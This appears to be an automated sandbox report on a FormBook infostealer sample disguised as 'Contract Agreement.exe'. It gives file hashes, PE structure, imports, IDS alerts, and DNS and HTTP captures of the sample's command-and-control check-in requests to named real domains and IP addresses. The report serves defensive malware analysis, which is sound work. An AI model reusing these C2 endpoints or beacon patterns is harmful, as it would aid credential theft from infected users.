                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Contract Agreement.exe
                                          File size:228086
                                          MD5:75612f2e3922d80afe14068c3a510c99
                                          SHA1:ade818e1272e6131c504273ca678ff805d01d41d
                                          SHA256:913b12686b62bfbaa6cd0169c2b37bb2d06d095335f3ac14047ec49d3a755b2d
                                          SHA512:a755c8215b1ff95ab9476585b74b0fee751174e4eb2152a188683a40fda48a336ec777f28b8ecc52670202e1a88aca098c680cc53019acb4824d618c4bbb39c6
                                          SSDEEP:6144:HdP4bcqOmuNjVODr4i19VXuO06LAtSXpITmneW9wR:dyKNjUVXuO06cbTmneW98
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x40314a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 0000017Ch
                                          push ebx
                                          push ebp
                                          push esi
                                          xor esi, esi
                                          push edi
                                          mov dword ptr [esp+18h], esi
                                          mov ebp, 00409240h
                                          mov byte ptr [esp+10h], 00000020h
                                          call dword ptr [00407030h]
                                          push esi
                                          call dword ptr [00407270h]
                                          mov dword ptr [007A3030h], eax
                                          push esi
                                          lea eax, dword ptr [esp+30h]
                                          push 00000160h
                                          push eax
                                          push esi
                                          push 0079E540h
                                          call dword ptr [00407158h]
                                          push 00409230h
                                          push 007A2780h
                                          call 00007F087CB76218h
                                          mov ebx, 007AA400h
                                          push ebx
                                          push 00000400h
                                          call dword ptr [004070B4h]
                                          call 00007F087CB73959h
                                          test eax, eax
                                          jne 00007F087CB73A16h
                                          push 000003FBh
                                          push ebx
                                          call dword ptr [004070B0h]
                                          push 00409228h
                                          push ebx
                                          call 00007F087CB76203h
                                          call 00007F087CB73939h
                                          test eax, eax
                                          je 00007F087CB73B32h
                                          mov edi, 007A9000h
                                          push edi
                                          call dword ptr [00407140h]
                                          call dword ptr [004070ACh]
                                          push eax
                                          push edi
                                          call 00007F087CB761C1h
                                          push 00000000h
                                          call dword ptr [00407108h]
                                          cmp byte ptr [007A9000h], 00000022h
                                          mov dword ptr [007A2F80h], eax
                                          mov eax, edi
                                          jne 00007F087CB739FCh
                                          mov byte ptr [esp+10h], 00000022h
                                          mov eax, 00000001h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          Name                                 | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x7344          | 0xb4         | .rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x3ac000        | 0x900        | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_IAT            | 0x7000          | 0x280        | .rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                          IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                          Sections

                                          Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy       | Characteristics
                                          .text  | 0x1000          | 0x59de       | 0x5a00   | False    | 0.681293402778  | data      | 6.5143386598  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata | 0x7000          | 0x10f2       | 0x1200   | False    | 0.430338541667  | data      | 5.0554281206  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data  | 0x9000          | 0x39a034     | 0x400    | unknown  | unknown         | unknown   | unknown       | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata | 0x3a4000        | 0x8000       | 0x0      | False    | 0               | empty     | 0.0           | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc  | 0x3ac000        | 0x900        | 0xa00    | False    | 0.409375        | data      | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name          | RVA      | Size  | Type                                                                         | Language | Country
                                          RT_ICON       | 0x3ac190 | 0x2e8 | data                                                                         | English  | United States
                                          RT_DIALOG     | 0x3ac478 | 0x100 | data                                                                         | English  | United States
                                          RT_DIALOG     | 0x3ac578 | 0x11c | data                                                                         | English  | United States
                                          RT_DIALOG     | 0x3ac698 | 0x60  | data                                                                         | English  | United States
                                          RT_GROUP_ICON | 0x3ac6f8 | 0x14  | data                                                                         | English  | United States
                                          RT_MANIFEST   | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English  | United States

                                          Imports

                                          DLL: Imports
                                          KERNEL32.dll: CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                          USER32.dll: ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                          GDI32.dll: SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                          SHELL32.dll: SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                          ADVAPI32.dll: RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                          COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dll: OleInitialize, OleUninitialize, CoCreateInstance
                                          VERSION.dll: GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                          Possible Origin

                                          Language of compilation system | Country where language is spoken
                                          English                        | United States

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp                | Protocol | SID     | Message                              | Source Port | Dest Port | Source IP   | Dest IP
                                          04/12/21-13:51:58.358809 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49750       | 80        | 192.168.2.4 | 142.111.179.147
                                          04/12/21-13:51:58.358809 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49750       | 80        | 192.168.2.4 | 142.111.179.147
                                          04/12/21-13:51:58.358809 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49750       | 80        | 192.168.2.4 | 142.111.179.147
                                          04/12/21-13:52:19.304376 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49756       | 80        | 192.168.2.4 | 72.52.251.1
                                          04/12/21-13:52:19.304376 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49756       | 80        | 192.168.2.4 | 72.52.251.1
                                          04/12/21-13:52:19.304376 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49756       | 80        | 192.168.2.4 | 72.52.251.1

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 13:51:58.159307957 CEST | 49750 | 80 | 192.168.2.4 | 142.111.179.147
Apr 12, 2021 13:51:58.358573914 CEST | 80 | 49750 | 142.111.179.147 | 192.168.2.4
Apr 12, 2021 13:51:58.358721018 CEST | 49750 | 80 | 192.168.2.4 | 142.111.179.147
Apr 12, 2021 13:51:58.358808994 CEST | 49750 | 80 | 192.168.2.4 | 142.111.179.147
Apr 12, 2021 13:51:58.558334112 CEST | 80 | 49750 | 142.111.179.147 | 192.168.2.4
Apr 12, 2021 13:51:58.561944008 CEST | 80 | 49750 | 142.111.179.147 | 192.168.2.4
Apr 12, 2021 13:51:58.561978102 CEST | 80 | 49750 | 142.111.179.147 | 192.168.2.4
Apr 12, 2021 13:51:58.566862106 CEST | 49750 | 80 | 192.168.2.4 | 142.111.179.147
Apr 12, 2021 13:51:58.566922903 CEST | 49750 | 80 | 192.168.2.4 | 142.111.179.147
Apr 12, 2021 13:51:58.766283989 CEST | 80 | 49750 | 142.111.179.147 | 192.168.2.4
Apr 12, 2021 13:52:19.142992973 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.303884983 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.304124117 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.304375887 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.463366985 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.812648058 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.876868010 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.876897097 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.876910925 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.876959085 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.876988888 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.877928019 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.888386011 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.888438940 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.888464928 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.888492107 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1
Apr 12, 2021 13:52:19.973510981 CEST | 80 | 49756 | 72.52.251.1 | 192.168.2.4
Apr 12, 2021 13:52:19.973680019 CEST | 49756 | 80 | 192.168.2.4 | 72.52.251.1

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 13:50:53.274857998 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:53.326195002 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:53.356559992 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:53.405458927 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:53.504723072 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:53.553297043 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:55.215186119 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:55.264091969 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:56.115535021 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:56.166321993 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:56.967892885 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:57.017299891 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:57.976267099 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:58.025047064 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:58.923787117 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:58.977454901 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:50:59.742469072 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:50:59.794214964 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:14.706685066 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:14.755321980 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:22.559405088 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:22.618643999 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:24.463193893 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:24.516391993 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:29.051762104 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:29.110260963 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:44.948786974 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:45.094180107 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:45.661676884 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:45.784434080 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:46.331386089 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:46.382626057 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:46.391937017 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:46.450411081 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:46.795838118 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:46.854296923 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:47.407198906 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:47.468872070 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:48.079483032 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:48.139570951 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:48.691521883 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:48.881952047 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:49.048284054 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:49.112219095 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:49.603454113 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:49.665858984 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:50.631102085 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:50.693525076 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:51.400646925 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:51.458116055 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:51:57.929265022 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:51:58.152942896 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:52:00.546367884 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:52:00.605403900 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:52:18.802992105 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:52:19.141654015 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:52:32.890613079 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:52:32.943753958 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:52:34.582506895 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:52:34.648024082 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:52:37.992042065 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:52:38.072150946 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Apr 12, 2021 13:53:00.445595026 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Apr 12, 2021 13:53:00.546025991 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 13:51:57.929265022 CEST | 192.168.2.4 | 8.8.8.8 | 0x4da1 | Standard query (0) | www.sapanyc.com | A (IP address) | IN (0x0001)
Apr 12, 2021 13:52:18.802992105 CEST | 192.168.2.4 | 8.8.8.8 | 0x103a | Standard query (0) | www.bizcert360.com | A (IP address) | IN (0x0001)
Apr 12, 2021 13:52:37.992042065 CEST | 192.168.2.4 | 8.8.8.8 | 0x5edd | Standard query (0) | www.protocolmodern.com | A (IP address) | IN (0x0001)
Apr 12, 2021 13:53:00.445595026 CEST | 192.168.2.4 | 8.8.8.8 | 0x9b4d | Standard query (0) | www.nyariorganics.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 13:51:58.152942896 CEST | 8.8.8.8 | 192.168.2.4 | 0x4da1 | No error (0) | www.sapanyc.com | | 142.111.179.147 | A (IP address) | IN (0x0001)
Apr 12, 2021 13:52:19.141654015 CEST | 8.8.8.8 | 192.168.2.4 | 0x103a | No error (0) | www.bizcert360.com | bizcert360.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 13:52:19.141654015 CEST | 8.8.8.8 | 192.168.2.4 | 0x103a | No error (0) | bizcert360.com | | 72.52.251.1 | A (IP address) | IN (0x0001)
Apr 12, 2021 13:52:38.072150946 CEST | 8.8.8.8 | 192.168.2.4 | 0x5edd | Name error (3) | www.protocolmodern.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 13:53:00.546025991 CEST | 8.8.8.8 | 192.168.2.4 | 0x9b4d | Name error (3) | www.nyariorganics.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.sapanyc.com
• www.bizcert360.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49750 | 142.111.179.147 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 13:51:58.358808994 CEST | 3244 | OUT | GET /klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA HTTP/1.1
Host: www.sapanyc.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 13:51:58.561944008 CEST | 3247 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Apr 2021 11:51:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49756 | 72.52.251.1 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 13:52:19.304375887 CEST | 6729 | OUT | GET /klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84 HTTP/1.1
Host: www.bizcert360.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 13:52:19.876868010 CEST | 6730 | IN | HTTP/1.1 500 Internal Server Error
Date: Mon, 12 Apr 2021 11:52:19 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Vary: Accept-Encoding,User-Agent
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
                                          Data Raw: 61 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 33 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 33 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 33 70 78 20 72 67 62 
61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 33 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73
                                          Data Ascii: aef<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><meta name='robots' content='noindex,follow' /><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.13);box-shadow: 0 1px 3px rgba(0, 0, 0, 0.13);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Cons


Code Manipulations

User Modules

Hook Summary

